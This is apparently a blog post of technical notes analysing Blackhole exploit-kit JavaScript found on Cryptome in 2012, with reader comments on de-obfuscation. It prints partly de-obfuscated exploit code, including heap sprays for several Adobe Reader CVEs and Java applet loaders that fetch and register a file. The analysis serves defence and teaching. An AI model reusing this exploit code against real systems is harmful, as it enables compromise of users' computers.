Technical Notes: Malware Found on Cryptome

UPDATE 2012-05-21: see this comment added by Eric Gerds, author of PluginDetect. PluginDetect is legitimate software that is misappropriated by malware authors.  PluginDetect != malware.  
UPDATE 2012-02-19: by request I added the decompiled Java from obe.jar/rin.jar, see inline links.

UPDATE 2012-02-16: Cryptome links to prior art from Dec 12th 2011. It has visuals and more elaborate explanations. Good stuff!

UPDATE 2012-02-15:
I added section “Obfuscation”.

On February 12th 2012, Cryptome disclosed that between February 8th-12th 2012 it had been temporarily infected by what appears to be Blackhole Toolkit Website 12. I manually de-obfuscated and commented the stuff loaded by this de-obfuscated malicious Javascript that is included by afg.php that is included by each of 1000s of .htm files on Cryptome. These are my technical notes. The shellcodes in variables bjsg, _l1 and _l2 still need to be analyzed. I will update this post when I complete that.

1. Analysis of behavior

/* —- check whether browser = MSIE6/7/8 & IP in range; if yes, include via IFRAME <— ONE-TIME disclosure of malicious Javascript per IP address. Second etc. request get no code. */

1) check versions of Java, Adobe Reader, Flash
    jver = PluginDetect.getVersion(“Java”, “./getJavaInfo.jar”);
    pdfver = PluginDetect.getVersion(“AdobeReader”);
    flashver = PluginDetect.getVersion(‘Flash’);

/// —- based on Java version, embed applet —- ///
1a) iff Java 6.0.0-28, embed rin.jar <—- 
contents of rin.jar (not-so-gracefully) decompile to
function spl0() {
    if (jver[1] == 6 && jver[3] <= 28) {
        var f = document.createElement(‘applet’);
        f.setAttribute(‘code’, ‘Wiki.class’);
        f.setAttribute(‘archive’, ‘./content/rin.jar’); –>
        var p = document.createElement(‘param’);
        p.setAttribute(‘name’, ‘p’);
        p.setAttribute(‘value’, ‘vssMlgg=9Po9Pd%oP35%gOFU6gYPMvM-Vcd=G6cr’); // <—–

1b) iff Java < 6, embed obe.jar <— contents of obe.jar (gracefully) decompile to,,, and

 –> from the Java code:
   –> iff contains “Windows”
malfile =
HTTP GET, retrieved via FileOutputStream (I get 0 bytes)
regsvr32 -s malfile  // via Object.exec(); unused parameters “df567y”, “sdg7a”

function spl1() {
    if (jver[1] < 6) {
        var f = document.createElement(‘applet’);
        f.setAttribute(‘code’, ‘chrome.Plugin.class’);
        f.setAttribute(‘archive’, ‘./content/obe.jar’); ——>  HTTP GET to  ////////////////////package chrome; if (jver[1] == 6 && jver[3] <= 28) does HTTP GET to // NEVER HAPPENS;
        var p = document.createElement(‘param’);
        p.setAttribute(‘name’, ‘p’);
        p.setAttribute(‘value’, ‘vssMlgg=9Po9Pd%oP35%gOFU6gYPMvM-Vcd=G6cd’); // <—–


1c) do nothing

function spl2() {

/// —- based on Adobe Reader version, include malicious pdf via IFRAME —- /// 

1d) iff Adobe Reader 1-7
 function spl3() {
     if (pdfver[0] > 0 && pdfver[0] < 8) {


function ezvr(ra, qy) {
    while (ra.length * 2 < qy) {
        ra += ra;
    ra = ra.substring(0, qy / 2);
    return ra;

// EXPLOIT 1: CVE-2007-5659 –> Collab.collectEmailInfo()
// –> executed iff EScript-version is {6,7} AND appviewer-version < 7.11
// –> VERY similar code seen at e.g. (Jan 29th 2012)
function bx() {
    var dkg = new Array();
    var vw = 0x0c0c0c0c;
    var addr = 0x400000;
    var payload = unescape(bjsg); <——– SHELLCODE
    var sc_len = payload.length * 2;
    var qy = addr – (sc_len + 0x38);
    var yarsp = unescape(“%u9090%u9090”);
    yarsp = ezvr(yarsp, qy);
    var count2 = (vw – 0x400000) / addr;
    for (var count = 0; count < count2; count++) {
        dkg[count] = yarsp + payload;
    var overflow = unescape(“%u0c0c%u0c0c”);
    while (overflow.length < 44952) {
        overflow += overflow;
    this.collabStore = Collab.collectEmailInfo({
        subj: “”,
        msg: overflow

// EXPLOIT 2: CVE-2008-2992 –> util.printf()
// –> executed if EScript version == 7.1
// –> very similar code seen at e.g. (Jan 27th, 2012) and (Nov 6th, 2008)
function printf() {
    nop = unescape(“%u0A0A%u0A0A%u0A0A%u0A0A”);
    var payload = unescape(bjsg); <——– SHELLCODE
    heapblock = nop + payload;
    bigblock = unescape(“%u0A0A%u0A0A”);
    headersize = 20;
    spray = headersize + heapblock.length;
    while (bigblock.length < spray) {
        bigblock += bigblock;
    fillblock = bigblock.substring(0, spray);
    block = bigblock.substring(0, bigblock.length – spray);
    while (block.length + spray < 0x40000) {
        block = block + block + fillblock;
    mem = new Array();
    for (i = 0; i < 1400; i++) {
        mem[i] = block + heapblock;
    var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
    util.printf(“%45000f”, num);

// EXPLOIT 3: CVE-2009-0927 –> Collab.getIcon
// –> executed iff EScript version == 9 OR (appviewer-version == 8 AND EScript-version <=8.12)
// –> very similar code observed e.g. at (Jan 29th 2012) and (Mar 3rd 2011)
function geticon() {
    var arry = new Array();
    if (app.doc.Collab.getIcon) {
        var payload = unescape(bjsg);   <——– SHELLCODE
        var hWq500CN = payload.length * 2;
        var qy = 0x400000 – (hWq500CN + 0x38);
        var yarsp = unescape(“%u9090%u9090”);
        yarsp = ezvr(yarsp, qy);
        var p5AjK65f = (0x0c0c0c0c – 0x400000) / 0x400000;
        for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y++) {
            arry[vqcQD96y] = yarsp + payload;
        var tUMhNbGw = unescape(“%09”);
        while (tUMhNbGw.length < 0x4000) {
            tUMhNbGw += tUMhNbGw;
        tUMhNbGw = “N.” + tUMhNbGw;
        app.doc.Collab.getIcon(tUMhNbGw); // BAM
aPlugins = app.plugIns;
var sv = parseInt(app.viewerVersion.toString().charAt(0));
for (var i = 0; i < aPlugins.length; i++) {
    if (aPlugins[i].name == “EScript”) {
        var lv = aPlugins[i].version;

// this version-based branching is similar to
// except that the below also includes the WEIRD branch for “(lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)” which is ALWAYS TRUE
if ((lv == 9) || ((sv == 8) && (lv <= 8.12))) { //  geticon() exploit iff EScript-version=9 OR (EScript-version<=8.12 AND appreader-version=8)
} else if (lv == 7.1) { // util.printf() exploit iff EScript=7.1
} else if (((sv == 6) || (sv == 7)) && (lv < 7.11)) { // Collab.collectEmailInfo() CVE-2007-5659 iff (EScript-version=6/7  &&  appviewer-version < 7.11)
} else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)) { // ALWAYS TRUE =) EScript >=9.1 of <=9.2 of >=8.13 of <=8.17
    // EXPLOIT 4a CVE-2008-0015
    // –> executed multiple times, within branch for EScript-version = (> 8.12 and < 8.2)
    // –> code very similar to (Dec 16th, 2009)
    function a() {
        util.printd(“p@111111111111111111111111 : yyyy111”, new Date());
    var h = app.plugIns;
    for (var f = 0; f < h.length; f++) {
        if (h[f].name == “EScript”) {
            var i = h[f].version;
    if ((i > 8.12) && (i < 8.2)) { // indien EScript-versie is > 8.12 en < 8.2
        c = new Array();
        var d = unescape(“%u9090%u9090”);
        var e = unescape(bjsg);  <——– SHELLCODE
        while (d.length <= 0x8000) {
            d += d;
        d = d.substr(0, 0x8000 – e.length);
        for (f = 0; f < 2900; f++) {
            c[f] = d + e;
        a(); // 1st run of CVE-2008-0015
        a(); // 2nd run of CVE-2008-0015
        try {
            // EXPLOIT 4b CVE-2009-4324
            // –> see
        } catch (e) {}
        a(); // 3rd run of CVE-2008-0015

1e) iff Adobe Reader=8 or Adobe Reader =9.3

    } else if ((pdfver[0] == 8) || (pdfver[0] == 9 && pdfver[1] <= 3)) {


// EXPLOIT 1 CVE-2010-0188 –> Libtiff integer overflow in Adobe Reader and Acrobat
// See

 var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();

_l3 = app;
_l4 = new Array();

function _l5() {
    var _l6 = _l3.viewerVersion.toString();
    _l6 = _l6.replace(‘.’, ”);
    while (_l6.length < 4) _l6 += ‘0’;
    return parseInt(_l6, 10)
function _l7(_l8, _l9) {
    while (_l8.length * 2 < _l9) _l8 += _l8;
    return _l8.substring(0, _l9 / 2)
function _I0(_I1) {
    _I1 = unescape(_I1);
    roteDak = _I1.length * 2;
    dakRote = unescape(‘%u9090’);
    spray = _l7(dakRote, 0x2000 – roteDak);
    loxWhee = _I1 + spray;
    loxWhee = _l7(loxWhee, 524098);
    for (i = 0; i < 400; i++) _l4[i] = loxWhee.substr(0, loxWhee.length – 1) + dakRote;
function _I2(_I1, len) {
    while (_I1.length < len) _I1 += _I1;
    return _I1.substring(0, len)
function _I3(_I1) {
    ret = ”;
    for (i = 0; i < _I1.length; i += 2) {
        b = _I1.substr(i, 2);
        c = parseInt(b, 16);
        ret += String.fromCharCode(c);
    return ret
function _ji1(_I1, _I4) {
    _I5 = ”;
    for (_I6 = 0; _I6 < _I1.length; _I6++) {
        _l9 = _I4.length;
        _I7 = _I1.charCodeAt(_I6);
        _I8 = _I4.charCodeAt(_I6 % _l9);
        _I5 += String.fromCharCode(_I7 ^ _I8);
    return _I5
function _I9(_I6) {
    _j0 = _I6.toString(16);
    _j1 = _j0.length;
    _I5 = (_j1 % 2) ? ‘0’ + _j0 : _j0;
    return _I5
function _j2(_I1) {
    _I5 = ”;
    for (_I6 = 0; _I6 < _I1.length; _I6 += 2) {
        _I5 += ‘%u’;
        _I5 += _I9(_I1.charCodeAt(_I6 + 1));
        _I5 += _I9(_I1.charCodeAt(_I6))
    return _I5
function _j3() {
    _j4 = _l5();
    if (_j4 < 9000) {
        _j5 = ‘o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK’;
        _j6 = _l1;
        _j7 = _I3(_j6)
    } else {
        _j6 = _l2;
        _j7 = _I3(_j6)
    _j8 = ‘SUkqADggAABB’;
    _j9 = _I2(‘QUFB’, 10984);
    _ll1 = _j8 + _j9 + _ll0 + _j5;
    _ll2 = _ji1(_j7, ”);
    if (_ll2.length % 2) _ll2 += unescape(”);
    _ll3 = _j2(_ll2);
        k: _ll3
    }) _I0(k);
    qwe123b.rawValue = _ll1



1f) do nothing
function spl4() {

1g) wait
function spl5() {
    setTimeout(end_redirect, 8000)

As stated above: the shellcodes in variables bjsg, _l1 and _l2 still need to be analyzed.

Random observation: the code refers to many different OSs and browsers. Example:

d = [“Win”, 1, “Mac”, 2, “Linux”, 3, “FreeBSD”, 4, “iPhone”, 21.1, “iPod”, 21.2, “iPad”, 21.3, “Win” + “.*CE”, 22.1, “Win.*Mobile”, 22.2, “Pockets*PC”, 22.3, “”, 100];
c.isGecko = (/Gecko/i).test(h) && 1 && (/Geckos*/s*d/i).test(i);
c.isSafari = (/Safaris*/s*d/i).test(i) && (/Apple/i).test(g);
c.isChrome = (/Chromes*/s*(d[d.]*)/i).test(i);
c.isOpera = (/Operas*[/]?s*(d+.?d*)/i).test(i);
c.isIE = new Function(“return ” + e + “*@” + “cc_on!@*” + e + “fa” + “lse”)();

2. Obfuscation
‘Obfuscation’ refers to hiding program flow and variables to make it difficult for humans and computers to understand WHAT a program does (e.g. intercept keystrokes, attack others systems, avoid detection) and HOW (e.g. SetWindowsHookEx, nmap + exploit remote vulns in Windows, rootkit techniques), including network connectivity.

Here are examples of obfuscation found in the Blackhole malware.

1) in afg.php we observe:
1a) example 1:

in stead of simply:
or even more simply, using a clearly-named variable:

1b) example 2:

in stead of simply:

$browser = “MSIE”
2) in the content included from we observe
2a) example 3:

<em>58a#69a#57a#75a#67a#59a#68a#74a#4a#77a#72a#63a (….) </em>
// a) ‘decipher’ what is between <em></em>
// b) execute that as Javascript
in stead of simply:
<output of (a) here>

2b) example 4:

in stead of simply:


3) in the content included by the malicious Javascript in (2) we observe
3a) example 5, in (=decompiled version of Plugin.class inside obe.jar);

public String d = e(“h6FeWh6Feih6Fendh6Feh6Feoh6Fewh6Fesh6Fe”.split(“h6Fe”));
public static String e(String[] p1)
{ // de-obfuscate
  StringBuffer l1 = new StringBuffer(“”);
  for (int i = 0; i < p1.length; l1.append(p1[(i++)].trim()));
  return l1.toString();

in stead of simply:
public String d = “Windows”;

3b) example 6, in the ADP2-PDF, we observe

function test(){
    return w(s.join(”));  // <— final step of de-obfuscation
ar={q:’0^1^2^3^4^1^5^5^ (….) }[‘q’]; // <——- obfuscated Javascript

// start of lots of small de-obfuscation steps:
cc={q:”var pding;b,cefhots_x=wAy()l1″420657839u{.VS’&lt;+I}*/DkR%-W[]mCj^?:LBKQYEUqFM”}.q;
if (aa==a){

instead of simply:
<output of test() here>

8 thoughts on “Technical Notes: Malware Found on Cryptome

  1. i recently had my gmail account hacked and started sending pdf’s out with this payload. still puzzled on how my gmail account got compromised 🙁

  2. I just received such a malicious PDF per Mail. For the moment i decoded an huge Array of numbers, and some code which is like Your example 3b. Unfortunaly i’m not to tough with javascript and don’t have a clue what some notations mean.

    Could You provide me with some hints?

    Here is the design of the code in snippets:

    function test3()
    cc={q:”var pding;b,cefhots_x=wAy()l1’420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM”}.q;
    // I guess q = “eval”

    Could You help me, understand the lines which begin with cc, b, w and n?

    I gues w is something wich will execute the code wich will be put into s, but i don’t get it how w becomes this thing.

    Thanks in Advance

    1. 1) cc={q:”var pding;b,cefhots_x=wAy()l1’420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM”}.q;

      …can be rewritten as:

      cc=”var pding;b,cefhots_x=wAy()l1’420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM”;

      2) b={v:{q:{x:this}}}.v.q.x;

      …can be rewritten as:


      3) n={v:cc}.v;

      …can be rewritten as:


      4) w={v:b[q]}.v;

      …can be rewritten as:


      5) Indeed, q=”eval” and w(s) is interpreted as eval(s)

      Does this help?

    2. Thanks a lot,

      this obfuscation methods are some kind of genius things. But i guess, these days the code is obfuscated by some automatic generators, so that any “script kiddie” could obfuscate its code.

      I didn’t know that a construct like {v:’some text’}.v could represent ‘some text’ itself, i can’t get any reasonable idea why such syntax would be used for other things than obfuscation.
      I guess the n=cc line is simply for distraction, because n is never used again (or maybe it will be used in the decoded code).

      Now i can also guess how the malicious is code stored in the array. It could be decoded by using the cc-array as an alphabet, and the numbers in the big array are only representing the position in the alphabet-array.

      Thanks a lot again. I’m new in the “security scene” and try to understand my “enemies & foes” as much as i can.

  3. What does “if(app)ar[]” do exactly. When trying to run it the interpreter seem to complain about “app”

  4. I am the author of PluginDetect, which is a legitimate Javascript library used to detect browser plugins. It is free of any malware/viruses/trojans. Unfortunately, some folks out there are using my software to detect vulnerable or out of date plugins, and then exploit that info to spread their malware.

    My problem is this: an antivirus software sometimes (rarely) will say that PluginDetect is malware, when clearly it is not (ie. a false positive). I think PluginDetect sometimes can trigger a false positive because it can appear in the same Javascript file along with ACTUAL malware, and then PluginDetect gets the blame by the AntiVirus vendors.

    On your page

    All the code from:
    var PluginDetect = {…}

    up to and including:

    is MY code, is legitimate, and contains no actual malware. The rest of it is not mine and is malware.

    My problem is that I do not know how to minimize the false positives that some AntiVirus scanners may give when scanning my PluginDetect script. Obviously I cannot stop any nefarious individuals from using PluginDetect, but it would nice if there were a way to reduce the false positives.

    [The AntiVirus folks are usually very good in correcting the false positives when they are reported, btw]

    Anyone have any ideas?


    1. Eric, I updated the post with a link to your comment. Thanks for commenting, very useful contribution. I have no idea how to prevent bad use of good code. I can only think of obfuscation + whitelisting, but in the end, the code will be executed in a client-side JavaScript interpreter and can easily be recovered / reverse engineered.

      Let me echo your question: anyone have any ideas?

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